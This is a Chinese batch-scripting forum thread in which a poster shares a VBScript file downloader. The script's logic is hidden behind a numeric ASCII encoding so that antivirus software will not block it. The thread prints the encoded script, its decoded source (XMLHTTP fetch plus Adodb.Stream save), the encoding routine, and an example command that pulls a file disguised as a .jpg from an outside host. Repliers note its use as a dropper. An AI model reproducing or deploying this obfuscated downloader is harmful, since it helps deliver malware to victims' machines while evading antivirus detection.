Board logo

标题: [原创] 真正能绕过杀软下载文件的VBS[原创加密版] [打印本页]

作者: somebody    时间: 2007-12-31 00:07     标题: 真正能绕过杀软下载文件的VBS[原创加密版]

代码使用说明:
CMD下执行以下命令即可下载单个远程文件,测试环境:windows 2003 + Kaspersky 6.0
cscript //nologo encode.vbs "http://kimhoo.lin.googlepages.com/encode.jpg" "d:\a bc\somebody.jpg"

PS: 1. 无论是网络路径还是本地路径,只要路径里含有空格或特殊字符,就必须用双引号括起来,最好括起来可以保证不出错。
     2. 想看源代码,将 Execute Decode(str) 改为 Wscript.Echo Decode(str) 然后以同样方法运行。
  1. Wscript.Sleep 1000
  2. Mystr = Array(115,111,109,101,98,111,100,121)
  3. for i=0 to Ubound(Mystr)
  4.     author=author&Chr(Mystr(i))
  5. next
  6. Wscript.Echo vbCr
  7. Wscript.Echo "  code by " & author
  8. Wscript.Echo "  LastModified: 2007-12-30  22:00"
  9. Wscript.Sleep 2000
  10. Wscript.Echo vbCr
  11. str1 = "      ╭━━╮╭━━╮╭╭━╮╭━━╮╭━━╮╭━━╮┏━━╮╭╮╭╮"
  12. str4 = "      ╰━╮┃┃┃┃┃┃╭╮┃┃╭━╯┃╭╮╮┃┃┃┃┃┃┃┃?┃┃?"
  13. str6 = "      ╰━━╯╰━━╯╰╯╰╯╰━━╯╰━━╯╰━━╯┗━━╯?╰╯?"
  14. str3 = "      ┃╰━╮┃┃┃┃┃┃┃┃┃╰━╮┃╰╯╯┃┃┃┃┃┃┃┃╰╮╭╯"
  15. str5 = "      ╭━╯┃┃╰╯┃┃┃┃┃┃╰━╮┃╰╯┃┃╰╯┃┃╰╯┃?┃┃?"
  16. str2 = "      ┃╭━╯┃╭╮┃┃??┃┃╭━╯┃╭╮┃┃╭╮┃┃╭╮┃┃╰╯┃"
  17. myArray = Array(str1,str2,str3,str4,str5,str6)
  18. For each sign in myArray
  19.     Wscript.Echo sign
  20. Next
  21. Wscript.Sleep 2000
  22. str="370,1160,960,1130,300,1000,1030,1060,990,300,1000,1090,1120,300,980,1090,1170,1080,1060,1090,950,980,1030,1080,1010,300,
  23. 1170,1030,1140,1020,300,630,810,650,710,710,300,990,1080,970,1090,980,1030,1080,1010,300,1140,1090,300,950,1160,1090,1030,980
  24. ,300,950,1080,1140,1030,430,1160,1030,1120,1150,1130,370,1130,300,1030,1080,1140,990,1120,1120,1150,1100,1140,1030,1090,1080,
  25. 110,80,370,970,1090,980,990,300,960,1190,300,1130,1090,1070,990,960,1090,980,1190,110,80,370,1140,990,1130,1140,1030,1080,101
  26. 0,300,990,1080,1160,1030,1120,1090,1080,1070,990,1080,1140,560,300,850,1030,1080,980,1090,1170,1130,300,480,460,460,490,300,4
  27. 10,300,730,950,1130,1100,990,1120,1130,1050,1190,300,520,440,460,110,80,770,1080,300,670,1120,1120,1090,1120,300,800,990,1130
  28. ,1150,1070,990,300,760,990,1180,1140,110,80,660,1030,1070,300,1030,800,990,1070,1090,"
  29. str=str&"1140,990,420,1030,740,1090,970,950,1060,110,80,1030,800,990,1070,1090,1140,990,300,590,300,740,650,950,1130,990,380,
  30. 850,810,970,1120,1030,1100,1140,440,630,1120,1010,1150,1070,990,1080,1140,1130,380,460,390,390,110,80,1030,740,1090,970,950,1
  31. 060,300,590,300,740,650,950,1130,990,380,850,810,970,1120,1030,1100,1140,440,630,1120,1010,1150,1070,990,1080,1140,1130,380,4
  32. 70,390,390,110,80,810,990,1140,300,780,1130,1090,1070,990,960,1090,980,1190,300,590,300,650,1120,990,950,1140,990,770,960,104
  33. 0,990,970,1140,380,320,750,1030,970,1120,1090,1130,1090,1000,1140,440,860,750,740,700,820,820,780,320,390,110,80,780,1130,109
  34. 0,1070,990,960,1090,980,1190,440,770,1100,990,1080,300,320,690,990,1140,320,420,1030,800,990,1070,1090,1140,990,420,460,110,8
  35. 0,780,1130,1090,1070,990,960,1090,980,1190,440,810,990,1080,980,380,390,110,80,810,990,"
  36. str=str&"1140,300,690,1130,1090,1070,990,960,1090,980,1190,300,590,300,650,1120,990,950,1140,990,770,960,1040,990,970,1140,38
  37. 0,320,630,980,1090,980,960,440,810,1140,1120,990,950,1070,320,390,110,80,690,1130,1090,1070,990,960,1090,980,1190,440,750,109
  38. 0,980,990,300,590,300,490,110,80,690,1130,1090,1070,990,960,1090,980,1190,440,820,1190,1100,990,300,590,300,470,110,80,690,11
  39. 30,1090,1070,990,960,1090,980,1190,440,770,1100,990,1080,380,390,110,80,690,1130,1090,1070,990,960,1090,980,1190,440,850,1120
  40. ,1030,1140,990,380,780,1130,1090,1070,990,960,1090,980,1190,440,800,990,1130,1100,1090,1080,1130,990,640,1090,980,1190,390,11
  41. 0,80,690,1130,1090,1070,990,960,1090,980,1190,440,810,950,1160,990,820,1090,680,1030,1060,990,300,1030,740,1090,970,950,1060,
  42. 420,480,110"
  43. Execute Decode(str)
  44. Wscript.Echo Wscript.Arguments(0) &" 已经成功下载完毕并保存到 "& Wscript.Arguments(1)
  45. Function Decode(code)
  46.     iArray=Split(code,",")
  47.     For i=0 To Ubound(iArray)-1
  48.         trueStr=trueStr&Chr(iArray(i)/10+2)
  49.     Next
  50.     Decode=trueStr
  51. End function
复制代码
ASCII加密过程:
  1. str="115,111,109,101,98,111,100,121"   ' str 的内容是 somebody
  2. Wscript.Echo Encode(str)
  3. Function Encode(code)
  4.     iArray=Split(code,",")
  5.     For i=0 To ubound(iArray)-1
  6.         s=(iArray(i)-2)*10
  7.         p=p&s&","
  8.     Next
  9.     Encode=p
  10. End function
复制代码
附: 字符串/ASCII 互转工具
作者: youxi01    时间: 2007-12-31 00:21

年轻人,还是走"正道"啊,怎么总喜欢玩什么 病毒类\黑客类的东西呢?
呵呵
作者: somebody    时间: 2007-12-31 14:31

靠~~汗死
什么病毒类...下载文件的VBS并不是什么病毒,只是调用了Microsoft.XMLHTTP
杀软爱管闲事喜欢插上一手,所以不加密是下不了东西的...
  1. 'vbs file for downloading with ASCII encoding to avoid anti-virus's interruption
  2. 'code by somebody
  3. 'testing environment: Windows 2003 + Kaspersky 6.0
  4. On Error Resume Next
  5. Dim iRemote,iLocal
  6. iRemote = LCase(WScript.Arguments(0))
  7. iLocal = LCase(WScript.Arguments(1))
  8. Set Psomebody = CreateObject("Microsoft.XMLHTTP")
  9. Psomebody.Open "Get",iRemote,0
  10. Psomebody.Send()
  11. Set Gsomebody = CreateObject("Adodb.Stream")
  12. Gsomebody.Mode = 3
  13. Gsomebody.Type = 1
  14. Gsomebody.Open()
  15. Gsomebody.Write(Psomebody.ResponseBody)
  16. Gsomebody.SaveToFile iLocal,2
复制代码
这是源代码,你保存为VBS,开着杀软,运行得了才怪呢..~

[ 本帖最后由 somebody 于 2007-12-31 14:35 编辑 ]
作者: 6589600    时间: 2008-1-26 15:51

是啊 ,开着杀软下东西就是慢,呵呵,好代码就像鱼,吃好了 香,吃不好会被噎死
作者: 葱头    时间: 2008-4-22 20:36

大家说~~用下载者来下载怎样~~嘿嘿~~~
作者: Randy    时间: 2009-10-30 15:27

编译器错误:未结束的字符串常量  ??
作者: idctop    时间: 2009-12-16 08:59

自己写完后把字符串转换成ASCII码就行了嘛。
作者: diannaoleyuan    时间: 2010-12-2 12:31

汗。。。。不知道对我有没有用。。。顶个~~~~~




欢迎光临 批处理之家 (http://bathome.net./) Powered by Discuz! 7.2